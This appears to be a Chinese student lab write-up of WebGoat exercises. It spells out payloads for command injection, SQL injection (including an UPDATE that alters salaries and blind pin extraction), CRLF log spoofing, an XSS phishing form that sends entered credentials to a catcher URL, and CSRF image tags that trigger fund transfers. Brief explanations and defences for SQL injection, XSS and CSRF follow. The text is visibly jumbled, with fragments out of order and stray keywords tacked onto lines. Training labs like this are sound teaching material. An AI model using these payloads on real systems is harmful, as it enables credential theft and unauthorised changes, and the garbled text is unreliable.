localhost:8080/WebGoat
打開webgoat,左側選擇題目Inspect Element
開始調試"& netstat -an & ipconfig"
View
查看結果SELECT * FROM weather_data WHERE station = 101 OR 1=1
,並在station的value
處作相應修改在username
一欄輸入:5224【學號】%0d%0aLogin Succeeded for username: admin
web
查看結果正則表達式
更改密碼欄maxlength爲100.sql
選擇用戶Neville (admin)
登錄,在密碼欄輸入' or 1=1 --
數據庫
101; update employee set salary=5224
進行攻擊,這裏沒有作太多操做101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2000 );
的語句縮小範圍,最終肯定pin值</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR>
<script>alert('I am 5224')</script>
【或其餘警告】<img src="http://localhost:8080/WebGoat/attack?Screen=288&menu=900&transferFunds=500" width="1" height="1">
【注意Screen
和menu
的值應爲本身頁面右側窗口出的數值】瀏覽器
<img src="attack?Screen=226&menu=900&transferFunds=5000" width="1" height="1"> <img src="attack?Screen=226&menu=900&transferFunds=confirm" width="1" height="1">
攻擊原理:SQL注入便是指web應用程序對用戶輸入數據的合法性沒有判斷,攻擊者能夠在web應用程序中事先定義好的查詢語句的結尾上添加額外的SQL語句,以此來實現欺騙數據庫服務器執行非受權的任意查詢,從而進一步獲得相應的數據信息。服務器
SQL注入通常流程是:cookie
尋找到SQL注入的位置session
判斷服務器類型和後臺數據庫類型xss
針對不通的服務器和數據庫特色進行SQL注入攻擊jsp
攻擊原理:XSS又稱CSS,全稱Cross SiteScript,跨站腳本攻擊,是Web程序中常見的漏洞,XSS屬於被動式且用於客戶端的攻擊方式,因此容易被忽略其危害性。其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)惡意的HTML代碼,當其它用戶瀏覽該網站時,這段HTML代碼會自動執行,從而達到攻擊的目的。如,盜取用戶Cookie、破壞頁面結構、重定向到其它網站等。
防護措施:HttpOnly防止劫取Cookie;輸入檢查通常是檢查用戶輸入的數據中是否包含一些特殊字符,如<、>、'、"等,若是發現存在特殊字符,則將這些字符過濾或者編碼等。
攻擊原理:CSRF攻擊的主要目的是讓用戶在不知情的狀況下攻擊本身已登陸的一個系統,相似於釣魚。如用戶當前已經登陸了郵箱,或bbs,同時用戶又在使用另一個,已經被你控制的站點,咱們姑且叫它釣魚網站。這個網站上面可能由於某個圖片吸引你,你去點擊一下,此時可能就會觸發一個js的點擊事件,構造一個bbs發帖的請求,去往你的bbs發帖,因爲當前你的瀏覽器狀態已是登錄狀態,因此session登錄cookie信息都會跟正常的請求同樣,純自然的利用當前的登錄狀態,讓用戶在不知情的狀況下,幫你發帖或幹其餘事情。
防護措施:驗證HTTP Referer字段,在請求地址中添加token並驗證,在HTTP頭中自定義屬性並驗證等。
有意思是真的有意思,個人kali全屏以後整個高斯模糊、我也是真的服氣